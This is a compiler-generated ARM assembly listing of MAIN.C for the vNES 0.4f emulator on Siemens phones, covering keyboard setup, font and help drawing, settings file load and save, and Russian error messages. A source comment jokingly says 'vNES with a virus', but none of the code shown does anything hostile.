//////////////////////////////////////////////////////////////////////////////
//                                                                           /
// IAR ARM ANSI C/C++ Compiler V4.42A/W32 EVALUATION   09/Dec/2010  18:20:56 /
// Copyright 1999-2005 IAR Systems. All rights reserved.                     /
//                                                                           /
//    Cpu mode        =  interwork                                           /
//    Endian          =  little                                              /
//    Stack alignment =  4                                                   /
//    Source file     =  C:\arm\vNes_sound\MAIN.C                            /
//    Command line    =  C:\arm\vNes_sound\MAIN.C -D NDEBUG -D NEWSGOLD -D   /
//                       ELKA -lCN C:\arm\vNes_sound\release_ELKA\List\ -lA  /
//                       C:\arm\vNes_sound\release_ELKA\List\ -o             /
//                       C:\arm\vNes_sound\release_ELKA\Obj\ -s9 --cpu_mode  /
//                       arm --endian little --cpu ARM926EJ-S --stack_align  /
//                       4 --interwork -e --fpu None --dlib_config           /
//                       "C:\arm2\Embedded Workbench 4.0                     /
//                       Evaluation\ARM\LIB\dl5tpainl8f.h" -I                /
//                       "C:\arm2\Embedded Workbench 4.0                     /
//                       Evaluation\ARM\INC\" --inline_threshold=2           /
//    List file       =  C:\arm\vNes_sound\release_ELKA\List\MAIN.s79        /
//                                                                           /
//                                                                           /
//////////////////////////////////////////////////////////////////////////////

        NAME MAIN

        RTMODEL "StackAlign4", "USED"
        RTMODEL "__cpu_mode", "__pcs__interwork"
        RTMODEL "__data_model", "absolute"
        RTMODEL "__endian", "little"
        RTMODEL "__rt_version", "6"

        RSEG CSTACK:DATA:NOROOT(2)

        PUBWEAK `?*?DATA_ID`
        MULTWEAK ??AudioInit??rA
        MULTWEAK ??AudioStart??rA
??DataTable0 EQU 0
??DataTable1 EQU 0
??DataTable10 EQU 0
??DataTable11 EQU 0
??DataTable12 EQU 0
??DataTable13 EQU 0
??DataTable14 EQU 0
??DataTable15 EQU 0
??DataTable16 EQU 0
??DataTable17 EQU 0
??DataTable18 EQU 0
??DataTable19 EQU 0
??DataTable2 EQU 0
??DataTable20 EQU 0
??DataTable21 EQU 0
??DataTable22 EQU 0
??DataTable23 EQU 0
??DataTable25 EQU 0
??DataTable26 EQU 0
??DataTable27 EQU 0
??DataTable28 EQU 0
??DataTable29 EQU 0
??DataTable3 EQU 0
??DataTable30 EQU 0
??DataTable31 EQU 0
??DataTable32 EQU 0
??DataTable33 EQU 0
??DataTable34 EQU 0
??DataTable35 EQU 0
??DataTable36 EQU 0
??DataTable39 EQU 0
??DataTable4 EQU 0
??DataTable40 EQU 0
??DataTable43 EQU 0
??DataTable44 EQU 0
??DataTable47 EQU 0
??DataTable48 EQU 0
??DataTable5 EQU 0
??DataTable6 EQU 0
??DataTable7 EQU 0
??DataTable9 EQU 0
        MULTWEAK ??NSF_Init??rA
        MULTWEAK ??SetVolume??rA
        MULTWEAK ??SysTimer??rA
        MULTWEAK ??drawhelp??rT
        MULTWEAK ??drawsym??rT
        MULTWEAK ??filter2??rA
        MULTWEAK ??filter??rA
        MULTWEAK ??freeall??rA
        MULTWEAK ??getscrXY??rT
        MULTWEAK ??initnul??rA
        MULTWEAK ??isFreeRam??rT
        MULTWEAK ??keyboard_init??rT
        MULTWEAK ??keypress??rT
        MULTWEAK ??loadini??rT
        MULTWEAK ??loadrom??rA
        MULTWEAK ??memsetd??rA
        MULTWEAK ??movsd??rA
        MULTWEAK ??movsw??rA
        MULTWEAK ??onclose??rT
        MULTWEAK ??oncreate??rT
        MULTWEAK ??onexit??rT
        MULTWEAK ??onkey??rT
        MULTWEAK ??onredraw??rT
        MULTWEAK ??onredslow??rT
        MULTWEAK ??onstart??rT
        MULTWEAK ??outmenu??rT
        MULTWEAK ??repaint??rT
        MULTWEAK ??saveini??rT
        MULTWEAK ??savename??rT
        PUBWEAK ?init?tab?DATA_I
        PUBWEAK ?init?tab?DATA_Z
        PUBLIC LastTmrVal
        PUBLIC Title
        PUBLIC drawhelp
        FUNCTION drawhelp,0203H
        LOCFRAME CSTACK, 16, STACK
        PUBLIC drawsym
        FUNCTION drawsym,0203H
        LOCFRAME CSTACK, 8, STACK
        PUBLIC errors
        PUBLIC exit
        PUBLIC file
        PUBLIC filename
        PUBLIC getscrXY
        FUNCTION getscrXY,0201H
        LOCFRAME CSTACK, 12, STACK
        PUBLIC help
        PUBLIC helpkey
        PUBLIC helpsel
        PUBLIC isFreeRam
        FUNCTION isFreeRam,0203H
        PUBLIC joy
        PUBLIC keyboard_init
        FUNCTION keyboard_init,0201H
        LOCFRAME CSTACK, 8, STACK
        PUBLIC keypress
        FUNCTION keypress,0203H
        LOCFRAME CSTACK, 12, STACK
        PUBLIC loadini
        FUNCTION loadini,0201H
        LOCFRAME CSTACK, 20, STACK
        PUBLIC menu
        PUBLIC mode
        PUBLIC onclose
        FUNCTION onclose,0201H
        LOCFRAME CSTACK, 4, STACK
        PUBLIC oncreate
        FUNCTION oncreate,0201H
        LOCFRAME CSTACK, 4, STACK
        PUBLIC onexit
        FUNCTION onexit,0201H
        LOCFRAME CSTACK, 4, STACK
        PUBLIC onkey
        FUNCTION onkey,0203H
        LOCFRAME CSTACK, 36, STACK
        PUBLIC onredraw
        FUNCTION onredraw,0201H
        LOCFRAME CSTACK, 8, STACK
        PUBLIC onredslow
        FUNCTION onredslow,0201H
        LOCFRAME CSTACK, 32, STACK
        PUBLIC onstart
        FUNCTION onstart,0203H
        LOCFRAME CSTACK, 12, STACK
        PUBLIC outmenu
        FUNCTION outmenu,0203H
        LOCFRAME CSTACK, 20, STACK
        PUBLIC param
        PUBLIC plus
        PUBLIC redefineptr
        PUBLIC repaint
        FUNCTION repaint,0201H
        LOCFRAME CSTACK, 4, STACK
        PUBLIC romname
        PUBLIC running
        PUBLIC saveini
        FUNCTION saveini,0201H
        LOCFRAME CSTACK, 16, STACK
        PUBLIC savename
        FUNCTION savename,0203H
        LOCFRAME CSTACK, 8, STACK
        PUBLIC tmpsize
        PUBLIC version
        PUBLIC zfont
        
        CFI Names cfiNames0
        CFI StackFrame CFA R13 HUGEDATA
        CFI Resource R0:32, R1:32, R2:32, R3:32, R4:32, R5:32, R6:32, R7:32
        CFI Resource R8:32, R9:32, R10:32, R11:32, R12:32, CPSR:32, R13:32
        CFI Resource R14:32, SPSR:32
        CFI VirtualResource ?RET:32
        CFI EndNames cfiNames0
        
        CFI Common cfiCommon0 Using cfiNames0
        CFI CodeAlign 2
        CFI DataAlign 4
        CFI ReturnAddress ?RET CODE
        CFI CFA R13+0
        CFI R0 Undefined
        CFI R1 Undefined
        CFI R2 Undefined
        CFI R3 Undefined
        CFI R4 SameValue
        CFI R5 SameValue
        CFI R6 SameValue
        CFI R7 SameValue
        CFI R8 SameValue
        CFI R9 SameValue
        CFI R10 SameValue
        CFI R11 SameValue
        CFI R12 Undefined
        CFI CPSR SameValue
        CFI R14 Undefined
        CFI SPSR SameValue
        CFI ?RET R14
        CFI EndCommon cfiCommon0
        
        
        CFI Common cfiCommon1 Using cfiNames0
        CFI CodeAlign 4
        CFI DataAlign 4
        CFI ReturnAddress ?RET CODE
        CFI CFA R13+0
        CFI R0 Undefined
        CFI R1 Undefined
        CFI R2 Undefined
        CFI R3 Undefined
        CFI R4 SameValue
        CFI R5 SameValue
        CFI R6 SameValue
        CFI R7 SameValue
        CFI R8 SameValue
        CFI R9 SameValue
        CFI R10 SameValue
        CFI R11 SameValue
        CFI R12 Undefined
        CFI CPSR SameValue
        CFI R14 Undefined
        CFI SPSR SameValue
        CFI ?RET R14
        CFI EndCommon cfiCommon1
        
AudioInit           SYMBOL "AudioInit"
AudioStart          SYMBOL "AudioStart"
NSF_Init            SYMBOL "NSF_Init"
SetVolume           SYMBOL "SetVolume"
SysTimer            SYMBOL "SysTimer"
filter              SYMBOL "filter"
filter2             SYMBOL "filter2"
freeall             SYMBOL "freeall"
initnul             SYMBOL "initnul"
loadrom             SYMBOL "loadrom"
memsetd             SYMBOL "memsetd"
movsd               SYMBOL "movsd"
movsw               SYMBOL "movsw"
??AudioInit??rA     SYMBOL "??rA", AudioInit
??AudioStart??rA    SYMBOL "??rA", AudioStart
??NSF_Init??rA      SYMBOL "??rA", NSF_Init
??SetVolume??rA     SYMBOL "??rA", SetVolume
??SysTimer??rA      SYMBOL "??rA", SysTimer
drawhelp            SYMBOL "drawhelp"
??drawhelp??rT      SYMBOL "??rT", drawhelp
drawsym             SYMBOL "drawsym"
??drawsym??rT       SYMBOL "??rT", drawsym
??filter2??rA       SYMBOL "??rA", filter2
??filter??rA        SYMBOL "??rA", filter
??freeall??rA       SYMBOL "??rA", freeall
getscrXY            SYMBOL "getscrXY"
??getscrXY??rT      SYMBOL "??rT", getscrXY
??initnul??rA       SYMBOL "??rA", initnul
isFreeRam           SYMBOL "isFreeRam"
??isFreeRam??rT     SYMBOL "??rT", isFreeRam
keyboard_init       SYMBOL "keyboard_init"
??keyboard_init??rT SYMBOL "??rT", keyboard_init
keypress            SYMBOL "keypress"
??keypress??rT      SYMBOL "??rT", keypress
loadini             SYMBOL "loadini"
??loadini??rT       SYMBOL "??rT", loadini
??loadrom??rA       SYMBOL "??rA", loadrom
??memsetd??rA       SYMBOL "??rA", memsetd
??movsd??rA         SYMBOL "??rA", movsd
??movsw??rA         SYMBOL "??rA", movsw
onclose             SYMBOL "onclose"
??onclose??rT       SYMBOL "??rT", onclose
oncreate            SYMBOL "oncreate"
??oncreate??rT      SYMBOL "??rT", oncreate
onexit              SYMBOL "onexit"
??onexit??rT        SYMBOL "??rT", onexit
onkey               SYMBOL "onkey"
??onkey??rT         SYMBOL "??rT", onkey
onredraw            SYMBOL "onredraw"
??onredraw??rT      SYMBOL "??rT", onredraw
onredslow           SYMBOL "onredslow"
??onredslow??rT     SYMBOL "??rT", onredslow
onstart             SYMBOL "onstart"
??onstart??rT       SYMBOL "??rT", onstart
outmenu             SYMBOL "outmenu"
??outmenu??rT       SYMBOL "??rT", outmenu
repaint             SYMBOL "repaint"
??repaint??rT       SYMBOL "??rT", repaint
saveini             SYMBOL "saveini"
??saveini??rT       SYMBOL "??rT", saveini
savename            SYMBOL "savename"
??savename??rT      SYMBOL "??rT", savename

        EXTERN A
        EXTERN AudioInit
        FUNCTION AudioInit,0200H
        EXTERN AudioStart
        FUNCTION AudioStart,0200H
        EXTERN C65
        EXTERN EL71
        EXTERN NSF_Init
        FUNCTION NSF_Init,0200H
        EXTERN SetVolume
        FUNCTION SetVolume,0202H
        EXTERN SysTimer
        FUNCTION SysTimer,0200H
        EXTERN Volume
        EXTERN d_boolean_static_fld
        EXTERN filter
        FUNCTION filter,0202H
        EXTERN filter2
        FUNCTION filter2,0202H
        EXTERN freeall
        FUNCTION freeall,0200H
        EXTERN getHeight
        EXTERN getWidth
        EXTERN height
        EXTERN initnul
        FUNCTION initnul,0200H
        EXTERN loadrom
        FUNCTION loadrom,0202H
        EXTERN memsetd
        FUNCTION memsetd,0200H
        EXTERN movsd
        FUNCTION movsd,0200H
        EXTERN movsw
        FUNCTION movsw,0200H
        EXTERN o_boolean_static_fld
        EXTERN run
        FUNCTION run,0600H
        EXTERN screen
        EXTERN screen_length
        EXTERN screens
        EXTERN screensize
        EXTERN t_boolean_static_fld
        EXTERN v_boolean_static_fld
        EXTERN width

// C:\arm\vNes_sound\MAIN.C
//    1 
//    2 // vNES с вирусом!
//    3 
//    4 #include "menu.h"

        RSEG DATA_I:DATA:SORT:NOROOT(2)
// char __data zfont[769]
zfont:
        DS8 772
        REQUIRE `?<Initializer for zfont>`

        RSEG DATA_Z:DATA:SORT:NOROOT(2)
// char *__data file
file:
        DS8 4

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock0 Using cfiCommon0
        CFI NoFunction
        THUMB
??keyboard_init??rT:
        BX       PC
        Nop      
        CFI EndBlock cfiBlock0
        REQUIRE keyboard_init

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock1 Using cfiCommon1
        CFI Function keyboard_init
        ARM
// __??Code32?? __code __interwork __atpcs void keyboard_init()
keyboard_init:
        PUSH     {R4,LR}
        CFI ?RET Frame(CFA, -4)
        CFI R4 Frame(CFA, -8)
        CFI CFA R13+8
        LDR      R4,??DataTable49  ;; param
        MOV      R2,#+32
        MOV      R1,#+0
        ADD      R0,R4,#+128
        SWI      +187
        MOV      R2,#+32
        MOV      R1,#+0
        ADD      R0,R4,#+224
        SWI      +187
        POP      {R4,PC}          ;; return
        CFI EndBlock cfiBlock1

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock2 Using cfiCommon0
        CFI NoFunction
        THUMB
??drawsym??rT:
        BX       PC
        Nop      
        CFI EndBlock cfiBlock2
        REQUIRE drawsym

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock3 Using cfiCommon1
        CFI Function drawsym
        ARM
// __??Code32?? __code __interwork __atpcs void drawsym(short *, char)
drawsym:
        LDR      R2,??drawsym_0   ;; zfont
        PUSH     {R4,R5}
        CFI R5 Frame(CFA, -4)
        CFI R4 Frame(CFA, -8)
        CFI CFA R13+8
        ADD      R1,R1,#+224
        LSLS     R1,R1,#+24
        MOVEQ    R1,#+0
        LSRNE    R1,R1,#+21
        ADD      R1,R1,R2
        MOV      R2,#+0
??drawsym_1:
        LDRB     R3,[R1], #+1
        MOV      R12,#+0
??drawsym_2:
        MOV      R4,R0
        ADD      R0,R4,#+2
        TST      R3,#0x80
        MVNNE    R5,#+0
        MOVEQ    R5,#+31
        STRH     R5,[R4, #+0]
        LSL      R3,R3,#+25
        LSR      R3,R3,#+24
        ADD      R12,R12,#+1
        CMP      R12,#+8
        BLT      ??drawsym_2
        LDR      R3,??DataTable41  ;; width
        ADD      R2,R2,#+1
        LDR      R3,[R3, #+0]
        CMP      R2,#+8
        ADD      R0,R0,R3, LSL #+1
        SUB      R0,R0,#+16
        BLT      ??drawsym_1
        POP      {R4,R5}
        CFI R4 SameValue
        CFI R5 SameValue
        CFI CFA R13+0
        BX       LR               ;; return
        DATA
??drawsym_0:
        DC32     zfont
        CFI EndBlock cfiBlock3

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock4 Using cfiCommon0
        CFI NoFunction
        THUMB
??drawhelp??rT:
        BX       PC
        Nop      
        CFI EndBlock cfiBlock4
        REQUIRE drawhelp

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock5 Using cfiCommon1
        CFI Function drawhelp
        ARM
// __??Code32?? __code __interwork __atpcs void drawhelp(char const *)
drawhelp:
        PUSH     {R4-R6,LR}
        CFI ?RET Frame(CFA, -4)
        CFI R6 Frame(CFA, -8)
        CFI R5 Frame(CFA, -12)
        CFI R4 Frame(CFA, -16)
        CFI CFA R13+16
        MOV      R4,#+0
        MOV      R5,#+0
        MOV      R6,R4
        BL       outmenu
        B        ??drawhelp_0
??drawhelp_1:
        LDR      R3,??DataTable38  ;; screen
        MUL      R0,R6,R0
        LDR      R3,[R3, #+0]
        MOV      R2,#+20
        ADD      R3,R3,R5, LSL #+4
        MLA      R0,R2,R0,R3
        ADD      R5,R5,#+1
        ADD      R0,R0,#+8
        BL       drawsym
        ADD      R4,R4,#+1
??drawhelp_0:
        LDR      R0,??drawhelp_2  ;; param
        ADD      R0,R4,R0
        LDRB     R1,[R0, #+280]
        CMP      R1,#+0
        POPEQ    {R4-R6,PC}
        LDR      R0,??DataTable41  ;; width
        CMP      R1,#+10
        LDR      R0,[R0, #+0]
        BEQ      ??drawhelp_3
        ASR      R2,R0,#+2
        ADD      R2,R0,R2, LSR #+29
        CMP      R5,R2, ASR #+3
        BLT      ??drawhelp_4
??drawhelp_3:
        MOV      R5,#+0
        ADD      R6,R6,#+1
??drawhelp_4:
        LDR      R2,??DataTable42  ;; height
        LDR      R3,??drawhelp_2+0x4  ;; 0x66666667
        LDR      R2,[R2, #+0]
        SMULL    R12,LR,R3,R2
        ASR      LR,LR,#+2
        ADD      R2,LR,R2, LSR #+31
        CMP      R6,R2
        BLT      ??drawhelp_1
        POP      {R4-R6,PC}       ;; return
        DATA
??drawhelp_2:
        DC32     param
        DC32     0x66666667
        CFI EndBlock cfiBlock5

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock6 Using cfiCommon0
        CFI NoFunction
        THUMB
??loadini??rT:
        BX       PC
        Nop      
        CFI EndBlock cfiBlock6
        REQUIRE loadini

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock7 Using cfiCommon1
        CFI Function loadini
        ARM
// __??Code32?? __code __interwork __atpcs int loadini()
loadini:
        PUSH     {R4-R6,LR}
        CFI ?RET Frame(CFA, -4)
        CFI R6 Frame(CFA, -8)
        CFI R5 Frame(CFA, -12)
        CFI R4 Frame(CFA, -16)
        CFI CFA R13+16
        LDR      R4,??DataTable49  ;; param
        SUB      SP,SP,#+4
        CFI CFA R13+20
        MOV      R5,#+38
        STRB     R5,[R4, #+0]
        MOV      R6,#+536
        MOV      R1,#+46
        ADD      R0,R6,R4
        SWI      +279
        LDR      R1,??DataTable8  ;; `?<Constant ".ini">`
        SWI      +26
        MOV      R3,SP
        MOV      R2,#+128
        MOV      R1,#+32768
        ADD      R0,R6,R4
        SWI      +10
        MOV      R6,R0
        CMN      R6,#+1
        BEQ      ??loadini_0
        MOV      R3,SP
        MOV      R2,#+1
        MOV      R1,R4
        SWI      +11
        LDRB     R0,[R4, #+0]
        CMP      R0,#+38
        STRBNE   R5,[R4, #+0]
        BNE      ??loadini_1
        MOV      R3,SP
        MOV      R2,#+255
        ADD      R1,R4,#+1
        MOV      R0,R6
        SWI      +11
??loadini_1:
        MOV      R1,SP
        MOV      R0,R6
        SWI      +13
??loadini_0:
        BL       keyboard_init
        MOV      R0,#+0
        POP      {R1,R4-R6,PC}    ;; return
        CFI EndBlock cfiBlock7

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock8 Using cfiCommon0
        CFI NoFunction
        THUMB
??saveini??rT:
        BX       PC
        Nop      
        CFI EndBlock cfiBlock8
        REQUIRE saveini

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock9 Using cfiCommon1
        CFI Function saveini
        ARM
// __??Code32?? __code __interwork __atpcs int saveini()
saveini:
        PUSH     {R4,R5,LR}
        CFI ?RET Frame(CFA, -4)
        CFI R5 Frame(CFA, -8)
        CFI R4 Frame(CFA, -12)
        CFI CFA R13+12
        LDR      R5,??DataTable49  ;; param
        SUB      SP,SP,#+4
        CFI CFA R13+16
        MOV      R4,#+536
        MOV      R1,#+46
        ADD      R0,R4,R5
        SWI      +279
        LDR      R1,??DataTable8  ;; `?<Constant ".ini">`
        SWI      +26
        MOV      R3,SP
        MOV      R2,#+256
        MOV      R1,#+1
        ORR      R1,R1,#0x8300
        ADD      R0,R4,R5
        SWI      +10
        MOV      R4,R0
        CMN      R4,#+1
        MOVEQ    R0,#+1
        POPEQ    {R1,R4,R5,PC}
        BL       keyboard_init
        MOV      R3,SP
        MOV      R2,#+256
        MOV      R1,R5
        MOV      R0,R4
        SWI      +12
        MOV      R1,SP
        MOV      R0,R4
        SWI      +13
        MOV      R0,#+0
        POP      {R1,R4,R5,PC}    ;; return
        CFI EndBlock cfiBlock9

        RSEG CODE:CODE:NOROOT(2)
        DATA
??DataTable8:
        DC32     `?<Constant ".ini">`

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock10 Using cfiCommon0
        CFI NoFunction
        THUMB
??isFreeRam??rT:
        BX       PC
        Nop      
        CFI EndBlock cfiBlock10
        REQUIRE isFreeRam

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock11 Using cfiCommon1
        CFI Function isFreeRam
        ARM
// __??Code32?? __code __interwork __atpcs int isFreeRam(char *, char *)
isFreeRam:
        LDR      R0,??DataTable51  ;; EL71
        LDRB     R0,[R0, #+0]
        CMP      R0,#+0
        MOVEQ    R0,#+1
        BXEQ     LR
        MOV      R0,#+0
        BX       LR               ;; return
        CFI EndBlock cfiBlock11

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock12 Using cfiCommon0
        CFI NoFunction
        THUMB
??keypress??rT:
        BX       PC
        Nop      
        CFI EndBlock cfiBlock12
        REQUIRE keypress

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock13 Using cfiCommon1
        CFI Function keypress
        ARM
// __??Code32?? __code __interwork __atpcs void keypress(unsigned char, int)
keypress:
        PUSH     {R4,R5,LR}
        CFI ?RET Frame(CFA, -4)
        CFI R5 Frame(CFA, -8)
        CFI R4 Frame(CFA, -12)
        CFI CFA R13+12
        LDR      R4,??DataTable49  ;; param
        MOV      R5,R1
        LDRB     R1,[R4, #+2]
        CMP      R1,#+0
        MOVNE    R1,#+160
        MOVEQ    R1,#+64
        ADD      R2,R1,R4
        MOV      R1,R0
        MOV      R0,R2
        SWI      +24
        CMP      R0,#+0
        POPEQ    {R4,R5,PC}
        LDR      R1,[R4, #+272]
        LDRB     R2,[R0, #+32]
        CMP      R5,#+0
        BEQ      ??keypress_0
        ORR      R1,R2,R1
        STR      R1,[R4, #+272]
        MOV      R1,#+1
        B        ??keypress_1
??keypress_0:
        BIC      R1,R1,R2
        STR      R1,[R4, #+272]
        MOV      R1,#+0
??keypress_1:
        STRB     R1,[R0, #+64]
        POP      {R4,R5,PC}       ;; return
        CFI EndBlock cfiBlock13

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock14 Using cfiCommon0
        CFI NoFunction
        THUMB
??repaint??rT:
        BX       PC
        Nop      
        CFI EndBlock cfiBlock14
        REQUIRE repaint

        RSEG DATA_Z:DATA:SORT:NOROOT(2)
//    5 int plus=0;
plus:
        DS8 4
//    6 extern void AudioTerminate();
//    7 extern void AudioInit();
//    8 extern void AudioStart();
//    9 extern void NSF_Init();
//   10 extern signed char Volume;
//   11 
//   12 
//   13 extern int screensize;
//   14 
//   15 extern unsigned short *screens;
//   16 extern char d_boolean_static_fld; //save_flag
//   17 extern char o_boolean_static_fld; //load flag (to romname)
//   18 extern char v_boolean_static_fld;
//   19 
//   20 extern void freeall();
//   21 extern void initnul();
//   22 extern char loadrom(char *s) ;
//   23 extern void run();
//   24 extern unsigned char SGOLD2, C65, S75, EL71;
//   25 extern int getWidth, getHeight, screen_length;
//   26 
//   27 extern int b_int_static_fld, L;
//   28 extern int B; //масштаб???

        RSEG DATA_Z:DATA:SORT:NOROOT(2)
//   29 long LastTmrVal;
LastTmrVal:
        DS8 4
//   30 const byte version=0x26;
//   31 int tmpsize;
//   32 extern int A; //frameskip=5
//   33 //extern int k_int_static_fld; //joy from vNES
//   34 //#define joy k_int_static_fld
//   35 

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock15 Using cfiCommon1
        CFI Function repaint
        ARM
//   36 void repaint(){
repaint:
        PUSH     {LR}
        CFI ?RET Frame(CFA, -4)
        CFI CFA R13+4
//   37   
//   38    //if((SysTimer()-LastTmrVal)<=(A*10))
//   39                             //{
//   40                                            REDRAW();  
        SWI      +370
//   41                                           // LastTmrVal=LastTmrVal+40-A*10;  
//   42                             //}
//   43                             
//   44                             //LastTmrVal=LastTmrVal+A*10;  
//   45   
//   46     ;}
        POP      {PC}             ;; return
        CFI EndBlock cfiBlock15

        RSEG CODE:CODE:NOROOT(2)
        CFI Block cfiBlock16 Using cfiCommon0
        CFI NoFunction
        THUMB
??outmenu??rT:
        BX       PC
        Nop      
        CFI EndBlock cfiBlock16
        REQUIRE outmenu

        RSEG DATA_C:CONST:SORT:NOROOT(2)
`?<Constant "vNES 0.4f (c)bn">`:
        DATA
        DC8 "vNES 0.4f (c)bn"

        RSEG DATA_C:CONST:SORT:NOROOT(2)
`?<Constant "\\307\\340\\357\\363\\361\\362\\350\\362\\3`:
        DATA
        DC8 0C7H, 0E0H, 0EFH, 0F3H, 0F1H, 0F2H, 0E8H, 0F2H
        DC8 0E5H, 20H, 2EH, 6EH, 65H, 73H, 20H, 0F4H
        DC8 0E0H, 0E9H, 0EBH, 0, 0
        DC8 0, 0, 0

        RSEG DATA_C:CONST:SORT:NOROOT(2)
`?<Constant "Unknown error\\000">`:
        DATA
        DC8 55H, 6EH, 6BH, 6EH, 6FH, 77H, 6EH, 20H
        DC8 65H, 72H, 72H, 6FH, 72H, 0, 0
        DC8 0

        RSEG DATA_C:CONST:SORT:NOROOT(2)
`?<Constant "\\315\\345 \\354\\356\\343\\363 \\356\\362`:
        DATA
        DC8 0CDH, 0E5H, 20H, 0ECH, 0EEH, 0E3H, 0F3H, 20H
        DC8 0EEH, 0F2H, 0EAH, 0F0H, 0FBH, 0F2H, 0FCH, 20H
        DC8 0F4H, 0E0H, 0E9H, 0EBH, 0, 0
        DC8 0, 0

        RSEG DATA_C:CONST:SORT:NOROOT(2)
`?<Constant "\\315\\345 .Nes \\360\\356\\354!\\000">`:
        DATA
        DC8 0CDH, 0E5H, 20H, 2EH, 4EH, 65H, 73H, 20H
        DC8 0F0H, 0EEH, 0ECH, 21H, 0, 0
        DC8 0, 0

        RSEG DATA_C:CONST:SORT:NOROOT(2)
`?<Constant "\\314\\340\\357\\357\\345\\360 \\355\\345 `:
        DATA
        DC8 0CCH, 0E0H, 0EFH, 0EFH, 0E5H, 0F0H, 20H, 0EDH
        DC8 0E5H, 20H, 0EFH, 0EEH, 0E4H, 0E4H, 0E5H, 0F0H
        DC8 0E6H, 0E8H, 0E2H, 0E0H, 0E5H, 0F2H, 0F1H, 0FFH
        DC8 2EH, 0, 0
        DC8 0

        RSEG DATA_C:CONST:SORT:NOROOT(2)
`?<Constant "\\315\\345\\342\\345\\360\\355\\373\\351 \\`:
        DATA
        DC8 0CDH, 0E5H, 0E2H, 0E5H, 0F0H, 0EDH, 0FBH, 0E9H
        DC8 20H, 0F0H, 0EEH, 0ECH, 21H, 0, 0
        DC8 0

        RSEG DATA_C:CONST:SORT:NOROOT(2)
`?<Constant ".ini">`:
        DATA
        DC8 ".ini"
        DC8 0, 0, 0

        RSEG DATA_C:CONST:SORT:NOROOT(2)
// char const __data helpsel[12]
helpsel:
        DATA
        DC8 " Select key"
//   47 
//   48 const char helpkey[]=" 1 A\n2 up\n3 B\n4 left\n5 start\n6 right\n7 AA\n8 down\n9 BB\n0 select\n* AB";
helpkey:
        DC8 20H, 31H, 20H, 41H, 0AH, 32H, 20H, 75H
        DC8 70H, 0AH, 33H, 20H, 42H, 0AH, 34H, 20H
        DC8 6CH, 65H, 66H, 74H, 0AH, 35H, 20H, 73H
        DC8 74H, 61H, 72H, 74H, 0AH, 36H, 20H, 72H
        DC8 69H, 67H, 68H, 74H, 0AH, 37H, 20H, 41H
        DC8 41H, 0AH, 38H, 20H, 64H, 6FH, 77H, 6EH
        DC8 0AH, 39H, 20H, 42H, 42H, 0AH, 30H, 20H
        DC8 73H, 65H, 6CH, 65H, 63H, 74H, 0AH, 2AH
        DC8 20H, 41H, 42H, 0

        RSEG DATA_C:CONST:SORT:NOROOT(0)
version:
        DATA
        DC8 38

        RSEG DATA_I:DATA:SORT:NOROOT(2)
//   49 extern char t_boolean_static_fld;
//   50 
//   51 extern void DrawScreen(); // Функция перерисовки экрана
//   52 void onredraw();
//   53 
//   54 char *Title="vNES 0.4f (c)bn";
//   55 
//   56 const char *errors[]={
//   57   0,
//   58   "Запустите .nes файл\0",
//   59   "Unknown error\0",
//   60   "Не могу открыть файл\0",
//   61   "Не .Nes ром!\0",
//   62   "Маппер не поддерживается.\0",
//   63   "Неверный ром!\0"
//   64 };
//   65 
//   66 char romname[256];
//   67 byte param[paramlength]=
param:
        DS8 256
        REQUIRE `?<Initializer for param>`
// int __data mode
mode:
        DS8 4
        REQUIRE `?<Initializer for mode>`
// int volatile __data running
running:
        DS8 4
        REQUIRE `?<Initializer for running>`
// int volatile __data exit
exit:
        DS8 4
        REQUIRE `?<Initializer for exit>`
// byte *__data redefineptr
redefineptr:
        DS8 4
        REQUIRE `?<Initializer for redefineptr>`
// int __data joy
joy:
        DS8 4
        REQUIRE `?<Initializer for joy>`
tmpsize:
        DS8 4
        REQUIRE `?<Initializer for tmpsize>`
// char __data menu[256]
menu:
        DS8 256
        REQUIRE `?<Initializer for menu>`
// char __data filename[128]
filename:
        DS8 128
        REQUIRE `?<Initializer for filename>`
romname:
        DS8 256
        REQUIRE `?<Initializer for romname>`
//   68 "\x26\x05\x00\x00\x00\x00\x84\xB0\x00\x00\x08\x00\x00\x00\x00\x00"
//   69 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
//   70 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
//   71 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
//   72 "\x3D\x3E\x3B\x3C\x2A\x23\x34\x36\x32\x38\x35\x1A\x31\x33\x37\x39"
//   73 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
//   74 "\x40\x80\x10\x20\x10\x20\x40\x80\x10\x20\x08\x01\x08\x04\x01\x02"
//   75 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
//   76 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
//   77 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
//   78 "\x3D\x3E\x3B\x3C\x2A\x23\x34\x36\x32\x38\x35\x1A\x31\x33\x37\x39"
//   79 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
//   80 "\x40\x80\x10\x20\x10\x20\x40\x80\x10\x20\x08\x01\x08\x04\x01\x02"
//   81 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
